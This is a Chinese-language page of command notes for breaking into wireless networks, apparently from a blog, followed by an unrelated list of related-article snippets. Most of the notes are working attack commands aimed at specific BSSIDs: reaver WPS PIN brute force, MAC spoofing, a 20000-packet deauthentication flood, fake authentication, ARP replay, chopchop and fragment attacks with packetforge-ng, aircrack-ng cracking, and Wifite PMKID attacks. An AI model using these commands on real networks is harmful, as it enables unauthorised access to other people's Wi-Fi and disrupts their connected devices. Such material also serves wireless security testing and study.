reaver爆破WPS PIN码:
  airodump-ng wlan0
  reaver -i wlan0 -b D0:76:E7:51:2A:78 -vv
 
macchanger更改MAC地址:
  macchanger -r wlan0
  -r:随机更换MAC
  -m:设置指定的MAC地址
  macchanger -m 72:8e:9c:2d:a8:bb wlan0
 
airodump-ng --bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon
当目标在有客户端在进行下载、看视频等操作时Date值会剧增。
 
此时开启wireshark打开airodump-ng捕获的cap数据包,可以看到客户端与路由器之间的交互信息
为了能够快速获得大量有用的数据包,可以使用deauth攻击将客户端与目标AP的连接打断再重连。
aireplay-ng --deauth 20000 -a 50:2B:73:18:ED:81 -c A4:50:46:E0:FA:06 wlan0mon
 
airodump-ng --bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon
50:2B:73:18:ED:81 00:02:6f:be:66:41
 
fakeauth攻击
  当目标AP无客户端连接时,我们可以使用无线网卡进行fakeauth(伪认证)攻击与目标AP交互。
  查看无线网卡MAC使用macchanger -s wlan0mon命令。
  aireplay-ng --fakeauth 0 -a 50:2B:73:18:ED:81 -c 00:02:6f:be:66:41 wlan0mon
  --fakeauth delay:伪装一个客户端和AP进行连接,其中delay表示连接的延迟时间。
 
ArpRequest注入攻击
  ArpRequest注入攻击是一种抓包后分析重发的过程,通过这种方式可以刺激产生大量交互数据。
  aireplay-ng --arpreplay -b 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon
 
chopchop攻击
  aireplay-ng --chopchop -a 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon
  --chopchop:快速攻击模式,该攻击模式用来获得一个包含密钥数据的xor文件。
 
  然后使用Packetforge-ng(网络数据包伪造工具)伪造数据包,packetforge-ng使用方法如下:
  packetforge-ng <mode> <options>
  packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y replay-1219-232225.xor -w chopchop-packet
  -0,--arp:伪造一个arp的数据包
  -l <ip[:port]> : 设置源IP地址和端口
  -k <ip[:port]> : 设置目标IP地址和端口
  -y <file> : 从指定文件读取PRGA(wep加密中间量)
 
  aireplay-ng -2 -r chopchop-packet wlan0mon
  -2,--interactive : 交互式帧选择
  -r <file> : 从pcap文件中提取数据包
 
  aircrack-ng chopchop-01.cap
 
fragment攻击
  fargmentg攻击通过生成有效的密钥流来进一步进行来破解无线密码。
  aireplay-ng --fragment -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 wlan0mon
 
  packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1219-232225.xor -w fargment-packet
 
  aireplay-ng -2 -r fragment-packet wlan0mon
 
  aircrack-ng fragment-01.cap
 
 
WiFite破解WEP/WPA/WPA2
  Wifite是一款自动化wifi密码破解工具,特点是支持多个wep,wpa加密的wifi网络,而且过程自动配置,无需人员干预!而且WiFi支持调用hcxdumptool、hcxtools和hashcat进行PMKID攻击。
  PMKID攻击是一种无需四次握手包即可破解WPA&WPA2密码的攻击方式,使用PMKID破解WPA预共享密钥的方法,与现有的其它破解方法不同,该方法不再需要抓取完整的EAPOL四次握手包,只需要一个EAPOL帧中的RSN IE(Robust Security Network Information Element)即可,具体可以参考

aireplay包注入攻击的更多相关文章

  1. 个人网站对xss跨站脚本攻击(重点是富文本编辑器情况)和sql注入攻击的防范

    昨天本博客受到了xss跨站脚本注入攻击,3分钟攻陷--其实攻击者进攻的手法很简单,没啥技术含量.只能感叹自己之前竟然完全没防范. 这是数据库里留下的一些记录.最后那人弄了一个无限循环弹出框的脚本,估计 ...

  2. Java程序员从笨鸟到菜鸟之(一百零二)sql注入攻击详解(三)sql注入解决办法

    sql注入攻击详解(二)sql注入过程详解 sql注入攻击详解(一)sql注入原理详解 我们了解了sql注入原理和sql注入过程,今天我们就来了解一下sql注入的解决办法.怎么来解决和防范sql注入, ...

  3. 防止SQL注入攻击的一些方法小结

    SQL注入攻击的危害性很大.在讲解其防止办法之前,数据库管理员有必要先了解一下其攻击的原理.这有利于管理员采取有针对性的防治措施. 一. SQL注入攻击的简单示例. statement := &quo ...

  4. PHP邮件注入攻击技术

    1. 简介 如 今,互联网的使用急剧上升,但绝大多数互联网用户没有安全知识背景.大多数的人都会使用互联网通过邮件Email的方式和他人进行通信.出于这个原因,大 多数网站允许他们的用户联系他们,向网站 ...

  5. 《sql注入攻击与防御 第2版》的总结 之 如何确定有sql注入漏洞

    看完<sql注入攻击与防御 第2版>后,发现原来自己也能黑网站了,就一个字:太爽了. 简单总结一下入侵步骤: 1.确定是否有sql注入漏洞 2.确定数据库类型 3.组合sql语句,实施渗透 ...

  6. SQL注入攻击三部曲之高级篇

    SQL注入攻击三部曲之高级篇 经过了入门篇和进阶篇的学习,相信诸位想要破解一般的网站是没有什么问题了,但是先别得意.正所谓学海无涯,技术的进步也是没有止境的.SQL注入是一个看起来简单,但是变数很多的 ...

  7. crlf注入攻击

    1.crlf 注入攻击. 原理:http数据包通过\r\n\r\n来分开http header何http body 实现:首先这种攻击发生在应用层,且发生在服务器返回给我们的http reponse没 ...

  8. XXE(XML External Entity attack)XML外部实体注入攻击

    导语 XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击.由于程序在解析输入的XML数据时,解析了攻击者 ...

  9. Java学习笔记47(JDBC、SQL注入攻击原理以及解决)

    JDBC:java的数据库连接 JDBC本质是一套API,由开发公司定义的类和接口 这里使用mysql驱动,是一套类库,实现了接口 驱动程序类库,实现接口重写方法,由驱动程序操作数据库 JDBC操作步 ...

随机推荐

  1. python学习笔记(6)数据类型-集合

    集合(set)是一个无序的不重复元素序列. 可以使用大括号 { } 或者 set() 函数创建集合,注意:创建一个空集合必须用 set() 而不是 { },因为 { } 是用来创建一个空字典. 创建格 ...

  2. python3多线程应用详解(第二卷:多线程到底是怎么工作的)

    现在很多人都说用多线程工作快是因为多个不同任务可以同时执行,注意我说的是不同任务,要是重复做一件事达到相同效果就是画蛇添足了,其实这是个错误的说法,线程真正的本质是无法同时执行的.现在我们来看下多线程 ...

  3. 响应式WEB页面开发实践

    转自:https://github.com/markyun/My-blog/issues/27 最近得到一个新任务单,让我用一套页面适应所有主流终端(Android.iPhone.iPad.PC),而 ...

  4. Luogu_1966_火柴排队

    题目描述 涵涵有两盒火柴,每盒装有\(n\)根火柴,每根火柴都有一个高度. 现在将每盒中的火柴各自排成一列, 同一列火柴的高度互不相同, 两列火柴之间的距离定义为:$ \sum (a_i-b_i)^2 ...

  5. CSS——NO.9(颜色值和长度值)

    */ * Copyright (c) 2016,烟台大学计算机与控制工程学院 * All rights reserved. * 文件名:text.cpp * 作者:常轩 * 微信公众号:Worldhe ...

  6. C++扬帆远航——6(三色球)

    /* * Copyright (c) 2016,烟台大学计算机与控制工程学院 * All rights reserved. * 文件名:sanseqiu.cpp * 作者:常轩 * 完成日期:2016 ...

  7. python爬虫之数据加密解密

    一.什么叫数据加密 数据加密是指利用加密算法和秘钥将明文转变为密文的过程. 二.数据加密的方式 1.单向加密 指只能加密数据而不能解密数据,这种加密方式主要是为了保证数据的完整性,常见的加密算法有MD ...

  8. 【算法记事本#NLP-1】最大匹配算法分词

    本文地址:https://www.cnblogs.com/oberon-zjt0806/p/12409536.html #NLP-1 最大匹配算法(MM) 最大匹配算法(Maximum Matchin ...

  9. 添加Windows 10开机启动项:No Hyper-V

    在Windows 10 1903版本加入了一项沙盒功能,1903版本以上的系统可以在控制面板-程序和功能-启用或关闭Windows功能中勾选Windows 沙盒选项,根据操作重启后即可打开沙盒功能. ...

  10. 量化投资学习笔记37——《Python机器学习应用》课程笔记10

    用KNN算法来进行数字识别,还是用sklearn自带的digits数据集. coding:utf-8 KNN算法实现手写识别 from sklearn import neighbors from sk ...